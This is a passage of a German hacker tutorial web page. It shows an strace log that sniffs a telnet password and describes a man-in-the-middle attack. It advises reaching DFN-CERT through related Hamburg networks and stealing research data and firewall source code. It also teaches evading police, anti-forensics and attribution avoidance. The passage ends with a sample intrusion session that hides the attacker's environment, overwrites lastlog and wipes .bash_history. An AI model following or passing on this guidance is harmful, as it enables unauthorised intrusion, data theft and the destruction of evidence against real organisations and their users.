+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: write(1, "k", 1) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: read(0, "\r", 1024) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: send(3, "\r\0", 2, 0) = 2</pre>
+Der Loginname ist "tick".
+<pre>&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: recv(3, "\r\nPassword: ", 1024, 0) = 12
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: write(1, "\r\nPassword: ", 12) = 12</pre>
+Der Passwort-Prompt.
+<pre>&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: read(0, "T", 1024) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: send(3, "T", 1, 0) = 1</pre>
+Zum Einlesen des Passwortes sind nur &acute;read(..)&acute; und &acute;send(..)&acute;
+noetig, da es bei Unix Maschinen ueblich ist das Passwort verdeckt einzulesen.
+<pre>&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: read(0, "E", 1024) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: send(3, "E", 1, 0) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: read(0, "S", 1024) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: send(3, "S", 1, 0) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: read(0, "T", 1024) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: send(3, "T", 1, 0) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: read(0, "S", 1024) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: send(3, "S", 1, 0) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: read(0, "T", 1024) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: send(3, "T", 1, 0) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: read(0, "R", 1024) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: send(3, "R", 1, 0) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: read(0, "A", 1024) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: send(3, "A", 1, 0) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: read(0, "C", 1024) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: send(3, "C", 1, 0) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: read(0, "E", 1024) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: send(3, "E", 1, 0) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: read(0, "\r", 1024) = 1
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: send(3, "\r\0", 2, 0) = 2
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: recv(3, "\r\0\r\n", 1024, 0) = 4
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: write(1, "\r\r\n", 3) = 3</pre>
+Sein Passwort ist "TESTSTRACE".
+<pre>&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: recv(3, "Last login: Mon Sep 22 15:58:52 ".., 1024, 0) = 48
+&lt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [pid 772]: write(1, "Last login: Mon Sep 22 15:58:52 ".., 48) = 48</pre>
+Die Lastlogin-Message, das Einloggen war also erfolgreich. Was wollen wir
+mehr?
+<br>&nbsp;
+<p>Kommen wir nun zur <i>MIM Attack</i>.
+<br>Eine <i>MIM Attack</i> haengt stark von dem Protokol fuer den Schluesselaustausch,
+von der zugrundeliegenden Netzwerkarchitektur, vom Routing und so weiter
+ab.
+<br>Ich werde mal ein kleines Szenario darstellen bei dem ein asymmetrischer
+(Public-Key) Kryptoalgorithmus verwendet wird. Die technischen Feinheiten
+sollen uns hier mal nicht interessieren.
+<br>Nehmen wir an, dass sich ein BKA Beamter (Harald) mit einem BSI Angestellten
+(Jochen) ueber die neusten Entwicklungen von und in der <b><font color="#3366FF">THC</font></b>-Crew
+unterhalten will. ;)
+<br>Zur Kommunikation wird ein <b>talk</b>-Derivat verwendet, welches die
+Daten encrypted ueber ein Computernetzwerk sendet. Desweiteren ist es die
+erste Kommunikation, sodass sie erst noch ihre Public-Keys austauschen
+muessen.
+<br>Unser Angreifer (TICK) sitz irgendwo zwischen den beiden. Nein, nicht
+'irgendwo'... er muss sich einen Platz aussuchen, den die Pakete auf jeden
+Fall passieren muessen (z.B. ein Router), oder er klinkt sich direkt ins
+Netzwerk ein, wenn er physikalischen Zugriff (z.B. bei einem Backbone Betreiber
+oder im lokalen Netz von Jochen oder Harald) hat, oder er manipuliert den
+<i>DNS
+Tree</i>, oder veraendert das Routing mit Hilfe von <i>RIP,</i> oder, oder,
+oder. Der Angreifer muss in der Lage sein Pakete abfangen, veraendern und
+weitersenden zu koennen; die original Pakete duerfen nicht den jeweiligen
+Kommunikationspartner erreichen.
+<br>So. Lasst das Spiel beginnen!
+<ul>
+<li>
+Jochen wartet auf die Verbindung von Harald</li>
+
+<li>
+Harald sendet seine Chat-Anfrage an Jochen</li>
+
+<li>
+die Software von Jochen und Harald etablieren jetzt die Verbindung</li>
+
+<li>
+TICK wird auf diese Aktion natuerlich aufmerksam</li>
+
+<li>
+wenn Harald seinen Public-Key an Jochen schickt, faengt TICK ihn ab und
+sendet stattdessen seinen eigenen Public-Key an Jochen und behauptet er
+kommt von Harald</li>
+
+<li>
+Jochen empfaengt TICK's Public-Key und denkt er kommt von Harald</li>
+
+<li>
+Jochen seinerseits sendet seinen Public-Key an Harald</li>
+
+<li>
+das gleiche Spiel: TICK tauscht Jochen's Key gegen seinen eigenen aus und
+sendet ihn an Harald</li>
+
+<li>
+Harald bemerkt nichts und beginnt mit der verschluesselten Kommunikation.
+Zur Verschluesselung benutzt er natuerlich TICK's Public-Key</li>
+
+<li>
+TICK empfaengt die Nachricht, dechiffriert sie mit seinem Secret-Key und
+erhaelt den Klartext (der natuerlich aufgezeichnet wird)</li>
+
+<li>
+TICK verschluesselt den Klartext mit dem Public-Key von Jochen, damit Jochen
+die Nachricht decrypten kann und sendet den Ciphertext an Jochen</li>
+
+<li>
+Jochen empfaengt die Nachricht und dechiffriert sie mit seinem Secret-Key</li>
+
+<li>
+Jochen antwortet auf Harald's Nachricht</li>
+
+<li>
+das Spiel geht von Vorne los, nur das in umgekehrter Richtung natuerlich
+Harald's Public-Key verwendet werden muss</li>
+
+<li>
+TICK lacht sich ins Faeustchen ;)</li>
+</ul>
+TICK ist es in seiner Position nicht nur moeglich die Daten im Klartext
+zu lesen, sondern er kann auch Daten einfuehgen und loeschen. Er koennte
+sich z. Bsp. als Harald ausgeben und Jochen diverse Fragen stellen um ihm
+so geheime Informationen aus der Nase zu ziehen und die Antworten loeschen,
+damit sie Harald nie zu Gesicht bekommt.
+<br><i>MIM Attacken </i>koennen durch Signaturen fuer die Public-Keys (z.B.
+eines <i>KDC</i>s) oder durch das <i>INTERLOCK-Protokol </i>erschwert/verhindert
+werden... aber da es sich hier nicht um ein Security-Paper handelt, werde
+ich nicht naeher darauf eingehen. ;)
+<p>Ich moechte noch kurz auf eine andere Art von Attacke eingehen, die
+z.B. bei <i>SecureShell </i>funktioniert.
+<br>Undzwar wenn der Public-Key einer Client-Server Verbindung bekannt
+ist, dann kann ein Angreifer mit diesem Key eigene Pakete verschluesseln
+und in den Stream einfuehgen. Somit ist es z.B. moeglich Befehle an eine
+Shell zu schicken.
+<p>Nungut, um ehrlich zu sein werden die meisten Hacks mit Hilfe von Remote-Exploits
+und Sniffern gemacht.
+<p>Abundzu solltest du auch 'n paar Hacker-Mags lesen... leider sind die
+meisten echter Schrott, was ich dir empfehlen koennte ist <a href="http://www.phrack.com">Phrack</a>
+,&nbsp; <a href="http://thc.inferno.tusculum.edu">THC-Mag</a> ... naja,
+und vielleicht noch das TFC- oder CRH-Mag.
+<p>Ach ja, es gibt da noch eine Methode... haette's fast vergessen. Ich
+nenne sie "Verwundbarkeit aufgrund von Beziehungen"... naja. Ok, nehmen
+wir mal an, du willst das DFN-CERT hacken, kommst aber nicht rein weil
+die ihre Rechner natuerlich gut gesichert haben. Nun musst du ein paar
+Ueberlegungen ueber die Beziehungen des CERT zu anderen Domains machen.
+Hier ein Bsp. ('-' Ueberlegung und '->' Folgerung):
+<pre>-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; das CERT hat eine Subdomain im Netz des DFNs (Deutsches Forschungs Netz)
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ->&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Bez. zu grossen Forschungseinrichtungen wei z.B. das DESY, die
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Frauenhofer Gesellschaft, der GMD et cetera
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Sniffer installieren und/oder gecrackte Accounts beim DFN testen.
+-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; das DFN-CERT liegt in Hamburg
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ->&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Somit besteht eine Beziehung zur Uni/FH Hamburg
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; d.h. wenn du die Uni/FH Hamburg hackst kannst du einen Sniffer
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; auf die DFN(-CERT)-Domain ansetzen
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (und um ehrlich zu sein wird das DFN-CERT auch von Prof.s der
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Uni-HH geleitet (z.B.: Wolfgang Ley))
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ->&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Das DESY ist ebenfalls in HH!
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Hiermit besteht schon eine doppelte Bez. zum DESY... also es lohnt
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; sich hier mal vorbei zu sehen. ;)
+-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; und noch ein paar Kleinigkeiten mehr...</pre>
+Bei Firmen sind Joint-Ventures noch interessant.
+<br>&nbsp;
+<p><a NAME="a5"></a>
+<h3>
+<font color="#990099">Wie rette ich meinen Arsch?</font></h3>
+
+<center><img SRC="pic2.gif" ></center>
+
+<p>Zu diesem Thema werde ich nicht viel sagen, ausser, dass du <a href="htcyt.html">How
+to cover your tracks</a> und&nbsp; <a href="http://www.thc.org">Anonymous
+Unix</a>&nbsp; von van Hauser/THC lesen solltest. Ich kann nur noch hinzufuegen:
+<ul>
+<li>
+Unterschaetze niemals die Admins und die Bullen.</li>
+
+<li>
+Wenn du nicht wirklich gut bist, dann lass' die Finger vom CERT, Firewalls
+etc... du bekommst nur Aerger.</li>
+
+<li>
+Informiere dich ueber die Gesetze deines Landes (wenn du in Dtld. wohnst,
+dann wirf mal einen Blick in's&nbsp; <a href="http://www.thc.org">THC-Mag
+4</a> )!</li>
+
+<li>
+Bereite dich psychisch und technisch auf eine Hausdurchsuchung vor. Wenn
+die Bullen vor der Tuer stehen und du verlierst die Nerven, dann wirst
+du viele Fehler machen, die nicht haetten sein muessen.</li>
+
+<li>
+Zerstoere nichts und klaue keine Firmengeheimnisse (es sei denn sie sind
+fuer Hacker interessant).</li>
+
+<li>
+Loesche alle Komponenten deiner Hacking-Tools und Exploits mit <b>srm</b>
+o.ae., damit man sie nicht durch rohes Auslesen der HD rekonstruieren kann.</li>
+
+<li>
+Stichwort e-Forensic: Auch bei dir wird im Laufe der Zeit die Routine eintreten
+und du gewoehnst dir an, bestimmte Befehle/Files/Exploits immer in der
+selben Reihenfolge zu benutzen und damit hinterlaesst du einen subtilen
+aber existenten "Fingerabdruck". Aus diesem Grund empfehle ich dir dringend
+die a-/mtime Time der benutzten Files zu veraendern - am Besten natuerlich
+nicht zu veraendern, also die alte Zeit zu setzen.</li>
+
+<li>
+Dasselbe gilt auch fuer die Homedirec.s der Accounts, die du benutzt hast.
+Ein <b>ls -ald /home/*</b> ist genauso effektiv wie der Aufruf von <b>last</b>.</li>
+
+<li>
+Du solltest dir ein Programm schreiben (oder benutze <b>indent</b>), das
+das Format deiner Source Codes voellig aufhebt, sodass z.B. dein Source
+Code nur aus einer langen Zeile besteht. Es existieren naemlich mehrere
+Security Papers, die sich damit beschaeftigen den Autor eines Programs
+anhand seines Programmierstils zu erkennen (wurde auch beim <i>Internet
+Worm</i> von Robert T. Morris angewandt; so konnte festgestellt werden,
+dass der Bufferoverflow Exploit fuer <b>fingerd</b> nicht urspruenglich
+von Morris stammt). Desweiteren solltest du keine extravaganten Bezeichnungen
+bei der Benennung deiner Funktionen und Variablen waehlen. Das nuetzt natuerlich
+alles nichts, wenn du deinen Handle in den Quellcode schreibst. ;)</li>
+</ul>
+<a NAME="a6"></a>
+<h3>
+<font color="#990099">Ein paar Gedanken zum Sein eines Hackers</font></h3>
+
+<center><img SRC="pic3.gif" ></center>
+
+<p>Naja, das Bild ist mir etwas zu schwarz-weiss (und das hat nichts mit
+der Farbe zu tun).
+<br>In meinen Augen vereinigt ein Hacker beide "Personen" (No Risk No Fun).
+<p>Ein paar Regeln solltest du immer im Hinterkopf behalten:
+<ul>
+<li>
+Zerstoere keine Rechner/Netze</li>
+
+<li>
+keine Erpressung</li>
+
+<li>
+keine Industriespionage</li>
+
+<li>
+hack nicht einfach wie wild 1000 Rechner nur weil es einfach ist, nimm
+mal 'n paar Herausforderungen an</li>
+
+<li>
+und noch 'ne Menge anderer Kram der gegen die Ehtik eines Hackers verstoesst,
+mir jetzt aber nicht einfaellt...</li>
+</ul>
+<a NAME="a7"></a>
+<h3>
+<font color="#990099">Yeah, time to become 31337.</font></h3>
+Ok, irgendwann wird das alles langweilig und/oder die Domain, in die du
+unbedingt hinein willst ist dicht wie 'n Bunker.
+<br>Jetzt wird es Zeit seine eigenen Tools und Remote-Exploits zu entwickeln.
+<p>Dazu ist folgendes noetig:
+<ol>
+<li>
+natuerlich solltest du fit im Programmieren unter Unix sein (C, C++, Perl,
+Shell-Spachen).</li>
+
+<li>
+du solltest die Exploits (von Bugtraq etc) genau studieren und einen Ueberblick
+und ein Verstaendnis fuer die Sicherheit von Programmen bekommen</li>
+
+<br>das 'Nach-programmieren' von Exploits uebt ungemein ;)
+<li>
+der Umgang mit Tools wie <b>strace</b>,<b> ltrace</b>, <b>gdb</b>, <b>purify</b>
+&amp; Co. sollte dir vertraut sein, damit du auch ohne Source Code Bugs
+in Programmen eruieren kannst</li>
+
+<li>
+besorge dir diverse Docs ueber das sichere Programmieren von Unix-Software
+<a href="http://www.sun.com/sunworldonline/swol-04-1998/swol-04-unixsecurity.html">http://www.sun.com/sunworldonline/swol-04-1998/swol-04-unixsecurity.html
+</a><a href="http://www.sun.com/sunworldonline/swol-04-1998/swol-04-security.html">http://www.sun.com/sunworldonline/swol-04-1998/swol-04-security.html
+</a><a href="http://www.homeport.org/~adam/review.html">http://www.homeport.org/~adam/review.html
+</a><a href="http://olympus.cs.ucdavis.edu/~bishop/secprog.html">http://olympus.cs.ucdavis.edu/~bishop/secprog.html
+</a><a href="http://www.research.att.com/~smb/talks/odds.[ps|pdf]">http://www.research.att.com/~smb/talks/odds.[ps|pdf]
+</a><a href="http://www.pobox.com/~kragen/security-holes.txt">http://www.pobox.com/~kragen/security-holes.txt</a></li>
+
+<li>
+und vergiss nicht, so viel Source Codes wie moeglich von den verschiedenen
+Unix-Derivaten zu bekommen, die du gehackt hast</li>
+
+<br>wenn du Glueck hast ist noch die Installations-CD im CD-Rom (ich hoffe
+mit Sources) ;)
+<br>ja, und weil kopieren einfacher ist als selber schreiben, solltest
+du bedenken, das Programme, die unter z.B. Linux 'nen Bug haben hoechstwahrscheinlich
+auch unter *BSD buggy sind (ok, mit 99,9%iger Ausnahme von OpenBSD)...
+<br>und solltest du mal kein Exploit von 'nem bereits gefixten Bug haben,
+dann besorge dir das Patch und versuche anhand dessen dein Exploit zu coden
+(es ist zwar bloed, dass es schon bekannt ist, aber die meisten Admins
+haben mehr Probleme damit ihr Netz am Laufen zu halten als die Bugs in
+irgendwelchen Programmen zu patchen)</ol>
+Du solltest niemanden die Moeglichkeit geben ein Profil von dir anzufertigen,
+dazu ist folgendes zu beachten
+<ol>
+<li>
+Halte nur zu <b>sehr</b> gut befreundeten Hackern kontakt.</li>
+
+<br>Wenn du mit ihnen Emails austauscht, dann sollten sie natuerlich mit
+PGP encrypted sein, zu einem anonymen Account gehen (benutze keinen gehackten
+Account, besser&nbsp; <a href="http://www.hotmail.com">www.hotmail.com</a>,
+<a href="http://www.yahoo.com">www.yahoo.com</a>,
+<a href="http://www.gmx.net">www.gmx.net</a>&nbsp;
+(mit POP!!!)... - der Rechner sollte natuerlich im Ausland stehen, die
+Ermittlungsbehoerden schrecken haeufig vor dem Papierkrieg zurueck, sind
+auch nur Menschen) unter Verwendung eines speziellen Handles, den du fuer
+nichts anderes verwendest.
+<br>Du solltest den Handle/Account unregelmaessig aendern und natuerlich
+auch ein neues PGP seckey-pubkey Paar erstellen (auch die Passphrase aendern!).
+<br>Achte darauf, dass dein PGP Key mit mindestens 2048 bit Schluessellaenge
+generiert wird, ausserdem solltest du aus Sicherheitsgruenden nicht die
+5.x Version benutzen, sondern bei die alten 2.6.x Version!!!
+<li>
+Wenn du dich unbedingt auf den einschlaegigen IRC Channels rumtreiben willst,
+dann aendere immer deinen Nick und wechsel auch deinen Host (da viele Rechner
+im Internet keine <b>irc</b>-Clients installiert haben, solltest du Relays
+benutzen (oder auch IP Source Routing und IP Spoofing, probier&acute;s
+aus)).</li>
+
+<br>Ich weiss, dass das aendern des Nicks nicht so schoen ist, weil man
+dadurch keine Reputation bei der breiten Masse bekommt; aber Reputation
+ist so toetlich wie nuetzlich (andere Hacker akzeptieren dich sofort und
+sind etwas geschwaetziger dir gegenueber - um sich zu profilieren - aber
+wenn du erstmal so weit bist, dass du deine eigenen Exploits schreibst,
+dann bist du auf den groessten Teil der Hacker sowieso nicht mehr angewiesen,
+und den interessanten Rest triffst du nicht so einfach im IRC).
+<br>Nuetzlich sind hier sogenannte Redirector, die eine TCP Verbindung
+weiterleiten, was auch schon in der Hinsicht interessant ist, wenn man
+sich vor Attacken von anderen Hacker schuetzten will, wenn man auf dem
+IRC zuviel Aerger verursacht hat ;-))
+<br>Auch hier koenntest du natuerlich einen speziellen Account fuer's IRC
+benutzen.
+<br>Die Polizei fertig nachweislich Logs von den IRC Chats an. (Netguru
+haben sie so gefasst, und der war psychisch nicht darauf vorbereitet, haha)
+<br>Ach, lass einfach die Finger vom IRC.
+<br>Es waere cool, wenn sich mal `n paar von euch die Zeit nehmen wuerden
+um ein Crypto-IRC auf Basis von SSH aufzubauen.</ol>
+Ok, desweiteren solltest du dir Gedanken machen woher du den Source Code
+von kommerziellen Betriebssystemen bekommen koenntest. Die Quellen von
+Linux, *BSD und Solaris kannst du zum Glueck legal erwerben; Microsoft
+gibt den Source Code von NT an Unis weiter.
+<br>Jetzt musst du dich daran machen und versuchen Zugriff auf den Quellcode
+von diversen Firewalls und Intrusion-Detection-Systems zu erlangen - dabei
+helfen dir die privaten Exploits der Betriebssysteme deren Sourcen du gesammelt
+hast. Der Source Code der Gauntlet Firewall ist gegen etwas Geld zu haben
+(aber AFAIK nicht mehr von den neuen Version), davon mal abgesehen basiert
+der Code einiger Proxies auf dem des TIS-FWTK (was hingegen nichts kostet).
+<br>Erfahrungen mit dem Aufbau der gaengigen Firewall Produkte ist unerlaesslich.
+Du solltest als Nebenjob oder natuerlich auch hauptberuflich im IT-Sicherheitsbereich
+arbeiten um so legal und kostenlos Netzwerksicherheits-Systeme evaluieren
+zu koennen und somit deren Schwachstellen zu kennen.
+<br>Halte Ausschau nach Universitaeten und Forschungsinstitute, die im
+Computersicherheitsbereich Forschung betreiben und kopiere dir die Forschungsdaten,
+nachdem du sie gehackt hast. Es ist zwar nicht sehr wahrscheinlich, dass
+eine Doktorarbeit kommerziell vermarktet wird, aber der Typ, der die Arbeit
+verfasst hat, wird einen gut bezahlten Job bei einer grossen Firma bekommen
+und dort seine Systeme (weiter-)entwickeln. Diese Systeme basieren mit
+hoher Wahrscheinlichkeit zum grossen Teil auf Algorithmen und Quelltexten
+seiner Doktorarbeit... ;)
+<br>Nunja, grosse Forschungeinrichtungen werden versuchen, ihre System
+auf den Markt zu bringen (evtl. mit Hilfe einer groesseren Firma) und wenn
+man dann den Source eines weit verbreiteten Produkts besitzt, dann ist
+man Koenig. Das Lustige ist, dass solche Forschungsscheunen Studenten beschaeftigen
+um Geld zu sparen, und die haben meistens keine Ahnung von sicherer Programmierung
+oder/und bewahren Forschungsdaten, mit denen sie arbeiten muessen, ungeschuetzt
+auf ihren Windows-PCs auf.
+<br>In den USA arbeiten die Universitaeten oft mit der Regierung zusammen,
+dasselbe gilt fuer Japan, dort arbeiten Universitaeten, Konzerne und die
+Regierung handinhand - naja, was haetten wir sonst von unseren BORGs erwartet?
+Dieser Umstand macht es dir einfach die Firewalls der *.gov's und *.com's
+zu hacken.
+<br>Ich hoffe, du hast jetzt eine Vorstellung davon bekommen, was so abgeht...
+<p>Erfahrungen mit (digitalen) Tk-Anlagen&nbsp; und deren Sicherheitsproblematik
+ist unabdingbar. Es nuetzt nicht viel, wenn du eienen externen Remote-Zugang
+zu einer Wartungseinheit hackst und dann nichts damit anzufangen weisst.
+<p>Bla, bla, bla... genug mit dem "Kochbuch"!
+<br>&nbsp;
+<p><a NAME="a8"></a>
+<h3>
+<font color="#993399">Ein Blick ueber die Schulter</font></h3>
+<font color="#000000">Ok, beim Zugucken lernt man am Schnellsten.</font>
+<br><font color="#000000">Also hier folgt ein Beispielhack mit den entsprechenden
+Kommentaren.</font>
+<br><font color="#000000">Wir gehen mal davon aus, dass wir den Account
+gesniffed (oder sonstwie bekommen) haben und dass wir alle Massnahmen durchgefuehrt
+haben um unsere Praesenz auf dem Ausgangsrechner zu verbergen.</font> Desweiteren
+wird dir ganze Session natuerlich durch unser Terminalprogramm (kein IP)
+aufgezeichnet.
+<p><font color="#FF0000">source > finger @victim.domain.com</font>
+<br><font color="#FF0000">[]</font>
+<p><font color="#FF0000">Welcome to Linux version 2.0.33 at victim.domain.com
+!</font>
+<p><font color="#FF0000">&nbsp; 6:21pm&nbsp; up&nbsp; 6:10h,&nbsp; 0 users,&nbsp;
+load average: 0.28, 0.11, 0.10</font>
+<p><font color="#FF0000">&nbsp; No one logged in.</font>
+<p><font color="#FF0000">source ></font>
+<p><font color="#000000">So ka, es scheint keiner eingeloggt zu sein, aber
+wir werden es auf dem Rechner noch genauer ueberpruefen.</font>
+<p><font color="#FF0000">source > echo $SHELL</font>
+<br><font color="#FF0000">/bin/bash</font>
+<br><font color="#FF0000">source > unset USER</font>
+<br><font color="#FF0000">source > unset MAIL</font>
+<br><font color="#FF0000">source > unset HOME</font>
+<br><font color="#FF0000">source > unset PRINTER</font>
+<br><font color="#FF0000">source > telnet</font>
+<br><font color="#FF0000">telnet > o victim.domain.com</font>
+<br><font color="#FF0000">Trying 10.255.0.1...</font>
+<br><font color="#FF0000">Connected to localhost.</font>
+<br><font color="#FF0000">Escape character is '^]'.</font>
+<p><font color="#FF0000">Linux 2.0.33 (victim.domain.com) (ttyp4)</font>
+<br>&nbsp;
+<p><font color="#FF0000">victim login: johnny</font>
+<br><font color="#FF0000">Password:</font>
+<br><font color="#FF0000">Have a lot of fun...</font>
+<br><font color="#FF0000">Last login: Wed Jun 17 19:16:07 on tty3.</font>
+<br><font color="#FF0000">No mail.</font>
+<p>Die Environmentvariablen USER, MAIL, HOME, PRINTER und UID (wenn du
+unter X arbeitest, dann vergiss die Variablen XTERM und DISPLAY nicht)
+werden von <b>telnet</b> zu <b>telnetd</b> uebertragen, somit kann ein
+Admin Informationen ueber den Hackeraccount bekommen (z.B. mit <b>noshell</b>)
+was wir natuerlich nicht wollen. Aus diesem Grund loeschen wir diese Werte,
+leider ist UID read-only und kann nicht von uns geaendert werden - evtl.
+geht's ueber ein C-Program, welches ein voellig neues Environment konstruiert
+und anschliessend <b>telnet</b>, eine Shell oder was auch immer exec'd,
+ich hab' keine Ahnung.
+<br>Ein Bestandteil des Protokols der r-Tools (<b>rlogin</b>, <b>rcp</b>,
+<b>rsh
+</b>bzw.
+<b>remsh</b>
+etc) ist der lokale Username - es ist also von der Verwendung dieser Tools
+abzuraten.
+<br><font color="#000000">Vielleicht hast du dich gefragt warum wir <b>telnet</b>
+interaktiv benutzen, nungut, der Grund ist einfach: damit </font>verhindern
+wir, dass der Zielrechner in der Prozessliste von &acute;source' auftaucht.
+<p><font color="#FF0000">victim:/home/johnny > rlogin victim</font>
+<br><font color="#FF0000">Password:</font>
+<br><font color="#FF0000">Have a lot of fun...</font>
+<br><font color="#FF0000">Last login: Wed Jun 17 19:16:07 on ttyp4 from
+source.ass.com.</font>
+<br><font color="#FF0000">No mail</font>
+<br><font color="#FF0000">victim:/home/johnny > exit</font>
+<br><font color="#FF0000">rlogin: connection closed.</font>
+<br><font color="#FF0000">victim:/home/johnny > csh -f</font>
+<br><font color="#FF0000">victim % ls -altr</font>
+<br><font color="#FF0000">[...]</font>
+<br><font color="#FF0000">-rw-------&nbsp;&nbsp; 1 test&nbsp;&nbsp;&nbsp;&nbsp;
+users&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 450 Jul&nbsp; 6 11:38
+.bash_history</font>
+<br><font color="#FF0000">victim % unset HISTFILE</font>
+<br><font color="#FF0000">victim % cat /dev/zero > .bash_history</font>
+<br><font color="#FF0000">^C</font>
+<br><font color="#FF0000">victim % rm .bash_history</font>
+<p><font color="#000000">Ja, alles was wir hier gemacht haben ist unsere
+Spuren etwas zu verschleiern und das ohne root-Rechte. Durch <b>rlogin</b>
+(<b>telnet</b> geht natuerlich auch) koennen wir unseren Lastlog-Entry
+ueberschreiben und was absolut wichtig ist, ist dass das History-File geloescht
+wird; und um kein neues File zu erzeugen rufen wir die <b>csh</b> auf,
+die per default kein History-File erstellt (wenn der User die <b>csh</b>
+benutzt kannst du auch die Bourne-Shell <b>sh</b> verwenden, aber vorsicht,
+denn unter Linux z.B. ist </font><font color="#33FF33">/bin/sh</font><font color="#000000">ein
+<i>Link
+</i>auf
+</font><font color="#33FF33">/bin/bash</font><font color="#000000">).</font>
+<br><font color="#000000">Das History-File musst du unbedingt am Anfang
+deiner Sitzung loeschen, denn wenn der Admin dich bemerkt und einen <i>Hard-Link
+</i>auf
+das File macht, dann bleiben die Daten auf der HD erhalten und der Admin
+kann ueber den <i>Hard-Link</i> darauf zugreifen.</font>
+<br><font color="#000000">Falls <b>login</b> SUID root installiert ist,
+hast du die Moeglichkeit auch dein </font><font color="#33FF33">utmp</font><font color="#000000">[</font><font color="#33FF33">x</font><font color="#000000">]-Entry
+zu ueberschreiben, dazu</font> <font color="#000000">rufst du einfach <b>login</b>
+auf und loggst dich ein.</font>
+<p><font color="#FF0000">victim % w</font>
+<br>&nbsp;<font color="#FF0000">&nbsp; 6:54pm&nbsp; up&nbsp; 6:43h,&nbsp;
+1 users,&nbsp; load average: 0.08, 0.09, 0.08</font>
+<br><font color="#FF0000">USER&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; TTY&nbsp;&nbsp;&nbsp;
+LOGIN@&nbsp; IDLE&nbsp;&nbsp; JCPU&nbsp;&nbsp; PCPU&nbsp; WHAT</font>
